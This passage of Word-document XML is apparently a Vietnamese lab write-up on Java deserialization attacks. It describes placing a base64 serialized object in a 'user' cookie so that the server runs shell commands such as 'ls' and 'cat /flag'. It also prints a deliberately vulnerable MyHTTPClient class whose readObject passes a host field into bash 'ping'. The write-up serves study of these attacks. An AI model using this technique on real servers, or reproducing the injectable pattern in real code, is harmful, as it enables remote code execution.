            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE22234" w14:textId="735B5DF9" w:rsidR="003B2FDB" w:rsidRPr="00CC11EF" w:rsidRDefault="003B2FDB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Thành công lấy được mã base64:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35791DF6" w14:textId="2655062F" w:rsidR="001120A2" w:rsidRDefault="001120A2">
      <w:r w:rsidRPr="001120A2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79F08644" wp14:editId="26DB0474">
            <wp:extent cx="5731510" cy="963295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="80738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8506" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="963295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8F901B" w14:textId="354D0B03" w:rsidR="003B2FDB" w:rsidRDefault="003B2FDB">
      <w:r>
        <w:t xml:space="preserve">Đưa </w:t>
      </w:r>
      <w:r w:rsidR="00B20DBD">
        <w:t xml:space="preserve">giá trị của mã base64 vừa nhận được vào cookie user </w:t>
      </w:r>
      <w:r w:rsidR="002735F4">
        <w:t>và kiểm tra kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5139B2C3" w14:textId="727BAB99" w:rsidR="00CC11EF" w:rsidRDefault="00CC11EF">
      <w:r w:rsidRPr="00CC11EF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D72FD94" wp14:editId="1EC95915">
            <wp:extent cx="5731510" cy="489585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="188523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38486" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="489585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42938C4C" w14:textId="0E1C827F" w:rsidR="0012540E" w:rsidRPr="0012540E" w:rsidRDefault="002735F4" w:rsidP="0012540E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết quả cho thấy hệ thống đã giải mã cookie user thành </w:t>
      </w:r>
      <w:r w:rsidR="001535AD">
        <w:t>đối tượng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001535AD">
        <w:t xml:space="preserve">Admin, khiến magic method toString được thực hiện giúp thực thi lệnh shell trong </w:t>
      </w:r>
      <w:r w:rsidR="0012540E">
        <w:t xml:space="preserve">qua </w:t>
      </w:r>
      <w:r w:rsidR="0012540E" w:rsidRPr="003B2FDB">
        <w:t>Runtime.exec()</w:t>
      </w:r>
      <w:r w:rsidR="0012540E">
        <w:t xml:space="preserve"> với giá trị ls nằm trong thuộc tính getNameCMD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC815B" w14:textId="71183BB8" w:rsidR="00E521BF" w:rsidRDefault="0012540E">
      <w:r>
        <w:t>Thực hiện tương tự bước trên và thay thế lệnh ls thành cat /flag để đọc flag của bài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7446AB" w14:textId="222C1767" w:rsidR="008A2D70" w:rsidRDefault="008A2D70">
      <w:r w:rsidRPr="008A2D70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="108AA157" wp14:editId="1CF36CAB">
            <wp:extent cx="5731510" cy="841375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1528357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57837" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="841375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C1FEF" w14:textId="77777777" w:rsidR="00A4464E" w:rsidRDefault="00A4464E" w:rsidP="00A4464E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702F7A70" w14:textId="77777777" w:rsidR="007D00FC" w:rsidRDefault="007D00FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="260575BD" w14:textId="60B3E39A" w:rsidR="00A4464E" w:rsidRPr="002146CF" w:rsidRDefault="00A4464E" w:rsidP="00A4464E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Mục tiêu </w:t>
      </w:r>
      <w:r w:rsidR="009A037B" w:rsidRPr="002146CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A0A329" w14:textId="28A54257" w:rsidR="00E521BF" w:rsidRDefault="0055387A">
      <w:r>
        <w:t xml:space="preserve">Ở bài lab này, </w:t>
      </w:r>
      <w:r w:rsidR="009F108F">
        <w:t xml:space="preserve">class Admin đã không còn và thay vào đó là class </w:t>
      </w:r>
      <w:r w:rsidR="009F108F" w:rsidRPr="0092004F">
        <w:t>MyHTTPClient</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92004F" w:rsidRPr="0092004F" w14:paraId="2006AAC3" w14:textId="77777777" w:rsidTr="00562E86">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45880742" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E8B4659" w14:textId="4DB5137E" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10166FDE" w14:textId="36B9A0E4" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47CE5F94" w14:textId="0A5E15AF" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="533598FD" w14:textId="56729FA8" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A3B1526" w14:textId="0663DC02" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57A73A94" w14:textId="3FFBE263" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457F2F8F" w14:textId="3D28C981" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B505B17" w14:textId="60C73606" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14C3488A" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22C29F0A" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F5C125C" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A391117" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A5165A3" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FB50697" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ECAA9AB" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FDBE4A7" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61DFCB49" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="618689A8" w14:textId="77777777" w:rsidR="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DAFA61B" w14:textId="77777777" w:rsidR="00562E86" w:rsidRPr="0092004F" w:rsidRDefault="00562E86" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="015BDF95" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C9CF9AC" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D230B35" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7471DFBF" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FA18704" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A1B80F9" w14:textId="4CEC728A" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C2F7F70" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>public class MyHTTPClient extends HTTPConnection {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D5AC516" w14:textId="5F3B0A1F" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">    private String host;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E47BB19" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">    public MyHTTPClient(String host)  {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20E1B3AE" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        super("http://" + host);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB6EEF5" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        this.host = host;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38A6A384" w14:textId="43A2FFC5" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BDBDA10" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">    public void sendRequest() {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C499338" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        String path = "/bin/bash";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DA1AB7A" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        ProcessBuilder pb = new ProcessBuilder(path, "-c", "curl " + this.host);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E3C42F6" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        try {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08E19077" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">            Process curlProcess = pb.start();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506FE871" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        } catch (IOException e) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70350E44" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">            e.printStackTrace();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E713107" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24E898D4" w14:textId="77003421" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AE97891" w14:textId="77777777" w:rsidR="00562E86" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">    private void readObject(ObjectInputStream in) throws IOException, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3BCCD1" w14:textId="03FEA415" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>ClassNotFoundException, InterruptedException {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="332D3290" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        in.defaultReadObject();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67F98079" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        // Test connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C28AB4" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        String path = "/bin/bash";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6750190B" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        ProcessBuilder pb = new ProcessBuilder(path, "-c", "ping " + this.host);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06DDAC4B" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        Process ping = pb.start();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01275EF0" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        int exitCode = ping.waitFor();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E71DEAC" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">        // TODO: add implement for exitCode check</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1284495F" w14:textId="62BC1FDB" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77FF810C" w14:textId="77777777" w:rsidR="0092004F" w:rsidRPr="0092004F" w:rsidRDefault="0092004F" w:rsidP="007D00FC">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0092004F">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D2B9E66" w14:textId="6744F745" w:rsidR="002E7FEB" w:rsidRPr="002E7FEB" w:rsidRDefault="002E7FEB" w:rsidP="009F108F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002E7FEB">
        <w:t xml:space="preserve">Đoạn code </w:t>
      </w:r>
      <w:r w:rsidRPr="002E7FEB">
        <w:t xml:space="preserve">định nghĩa </w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7FEB">
        <w:t xml:space="preserve"> MyHTTPClient kế thừa từ HTTPConnection. </w:t>
      </w:r>
      <w:r w:rsidR="00DA37F9">
        <w:t>Class</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7FEB">
        <w:t xml:space="preserve"> này lưu một trường host, khởi tạo URL cơ sở trong constructor, và chứa hai điểm quan trọng: sendRequest() thực thi lệnh hệ thống để gọi curl, </w:t>
      </w:r>
      <w:r w:rsidR="00B0562D">
        <w:t xml:space="preserve">còn </w:t>
      </w:r>
      <w:r w:rsidRPr="002E7FEB">
        <w:t xml:space="preserve">readObject(ObjectInputStream) thực hiện hành vi sau khi </w:t>
      </w:r>
      <w:r w:rsidR="00B0562D" w:rsidRPr="00B0562D">
        <w:t>đối tượng được</w:t>
      </w:r>
      <w:r w:rsidR="00B0562D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E7FEB">
        <w:t>deserialize (gọi ping tới host). readObject là phương thức đặc biệt</w:t>
      </w:r>
      <w:r w:rsidR="00DA37F9">
        <w:t xml:space="preserve"> (magic </w:t>
      </w:r>
      <w:r w:rsidR="00656DD1">
        <w:t>method</w:t>
      </w:r>
      <w:r w:rsidR="00DA37F9">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7FEB">
        <w:t xml:space="preserve"> của Java serialization, được gọi tự động khi đối tượng được khôi phục từ luồng.</w:t>
      </w:r>
      <w:r w:rsidR="005300C7">
        <w:t xml:space="preserve"> Đây là một điểm mấu chốt vì khi đối tượng MyHTTPClient được khôi phục </w:t>
      </w:r>
      <w:r w:rsidR="00531328" w:rsidRPr="00531328">
        <w:lastRenderedPageBreak/>
